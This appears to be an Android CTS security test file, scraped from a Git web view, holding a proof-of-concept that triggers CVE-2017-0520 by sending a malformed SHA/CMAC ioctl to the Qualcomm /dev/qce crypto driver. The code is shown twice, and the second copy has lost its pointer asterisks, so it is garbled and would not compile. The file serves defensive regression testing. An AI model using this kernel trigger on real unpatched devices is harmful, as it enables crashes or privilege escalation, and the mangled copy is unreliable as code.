hostsidetests/security/securityPatch/CVE-2017-0520/poc.c - platform/cts - Git at Google

 /**
  * Copyright (C) 2017 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
  *      http://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */

 #define _GNU_SOURCE
 #include <dirent.h>
 #include <dlfcn.h>
 #include <fcntl.h>
 #include <linux/sched.h>
 #include <pthread.h>
 #include <sched.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys/ioctl.h>
 #include <sys/mman.h>
 #include <sys/resource.h>
 #include <sys/stat.h>
 #include <sys/syscall.h>
 #include <sys/time.h>
 #include <sys/types.h>
 #include <sys/wait.h>
 #include <unistd.h>
 #include <unistd.h>

 void trigger_bug(void);
 int open_driver(void);

 struct buf_info {
   union {
     uint32_t offset;
     uint8_t *vaddr;
   };
   uint32_t len;
 };

 enum qcedev_sha_alg_enum {
   QCEDEV_ALG_SHA1 = 0,
   QCEDEV_ALG_SHA256 = 1,
   QCEDEV_ALG_SHA1_HMAC = 2,
   QCEDEV_ALG_SHA256_HMAC = 3,
   QCEDEV_ALG_AES_CMAC = 4,
   QCEDEV_ALG_SHA_ALG_LAST
 };
 #define QCEDEV_MAX_BUFFERS 16
 #define QCEDEV_MAX_SHA_DIGEST 32
 struct qcedev_sha_op_req {
   struct buf_info data[QCEDEV_MAX_BUFFERS];
   uint32_t entries;
   uint32_t data_len;
   uint8_t digest[QCEDEV_MAX_SHA_DIGEST];
   uint32_t diglen;
   uint8_t *authkey;
   uint32_t authklen;
   enum qcedev_sha_alg_enum alg;
 };

 #define QCEDEV_IOC_MAGIC 0x87
 #define QCEDEV_IOCTL_SHA_UPDATE_REQ \
   _IOWR(QCEDEV_IOC_MAGIC, 4, struct qcedev_sha_op_req)
 #define QCEDEV_IOCTL_SHA_INIT_REQ \
   _IOWR(QCEDEV_IOC_MAGIC, 3, struct qcedev_sha_op_req)

 int g_fd = -1;

 int open_driver() {
   char *dev_path = (char *)"/dev/qce";
   g_fd = open(dev_path, O_RDWR);
   return g_fd;
 }

 void trigger_bug() {
   struct qcedev_sha_op_req req;

   req.entries = 1;
   req.data_len = 0x4000;

   unsigned long *vaddr = (unsigned long *)malloc(0x1000);
   vaddr[0] = 0;
   vaddr[1] = (unsigned long)0xffffffffffffffff;
   req.data[0].len = 0x4000;
   req.data[0].vaddr = 0;

   req.diglen = 0x1000;
   req.authklen = 16;
   req.authkey = (uint8_t *)"111111111111111";
   req.alg = QCEDEV_ALG_AES_CMAC;

   ioctl(g_fd, QCEDEV_IOCTL_SHA_UPDATE_REQ, &req);
 }

 int main(int argc, char **argv) {
   setpriority(PRIO_PROCESS, gettid(), -19);
   if (open_driver() < 0) {
     return -1;
   }

   trigger_bug();
   return 0;
 }
	/**
	* Copyright (C) 2017 The Android Open Source Project
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at
	*
	* http://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*/

	#define _GNU_SOURCE
	#include <dirent.h>
	#include <dlfcn.h>
	#include <fcntl.h>
	#include <linux/sched.h>
	#include <pthread.h>
	#include <sched.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <sys/ioctl.h>
	#include <sys/mman.h>
	#include <sys/resource.h>
	#include <sys/stat.h>
	#include <sys/syscall.h>
	#include <sys/time.h>
	#include <sys/types.h>
	#include <sys/wait.h>
	#include <unistd.h>
	#include <unistd.h>

	void trigger_bug(void);
	int open_driver(void);

	struct buf_info {
	union {
	uint32_t offset;
	uint8_t *vaddr;
	};
	uint32_t len;
	};

	enum qcedev_sha_alg_enum {
	QCEDEV_ALG_SHA1 = 0,
	QCEDEV_ALG_SHA256 = 1,
	QCEDEV_ALG_SHA1_HMAC = 2,
	QCEDEV_ALG_SHA256_HMAC = 3,
	QCEDEV_ALG_AES_CMAC = 4,
	QCEDEV_ALG_SHA_ALG_LAST
	};
	#define QCEDEV_MAX_BUFFERS 16
	#define QCEDEV_MAX_SHA_DIGEST 32
	struct qcedev_sha_op_req {
	struct buf_info data[QCEDEV_MAX_BUFFERS];
	uint32_t entries;
	uint32_t data_len;
	uint8_t digest[QCEDEV_MAX_SHA_DIGEST];
	uint32_t diglen;
	uint8_t *authkey;
	uint32_t authklen;
	enum qcedev_sha_alg_enum alg;
	};

	#define QCEDEV_IOC_MAGIC 0x87
	#define QCEDEV_IOCTL_SHA_UPDATE_REQ \
	_IOWR(QCEDEV_IOC_MAGIC, 4, struct qcedev_sha_op_req)
	#define QCEDEV_IOCTL_SHA_INIT_REQ \
	_IOWR(QCEDEV_IOC_MAGIC, 3, struct qcedev_sha_op_req)

	int g_fd = -1;

	int open_driver() {
	char dev_path = (char )"/dev/qce";
	g_fd = open(dev_path, O_RDWR);
	return g_fd;
	}

	void trigger_bug() {
	struct qcedev_sha_op_req req;

	req.entries = 1;
	req.data_len = 0x4000;

	unsigned long vaddr = (unsigned long )malloc(0x1000);
	vaddr[0] = 0;
	vaddr[1] = (unsigned long)0xffffffffffffffff;
	req.data[0].len = 0x4000;
	req.data[0].vaddr = 0;

	req.diglen = 0x1000;
	req.authklen = 16;
	req.authkey = (uint8_t *)"111111111111111";
	req.alg = QCEDEV_ALG_AES_CMAC;

	ioctl(g_fd, QCEDEV_IOCTL_SHA_UPDATE_REQ, &req);
	}

	int main(int argc, char **argv) {
	setpriority(PRIO_PROCESS, gettid(), -19);
	if (open_driver() < 0) {
	return -1;
	}

	trigger_bug();
	return 0;
	}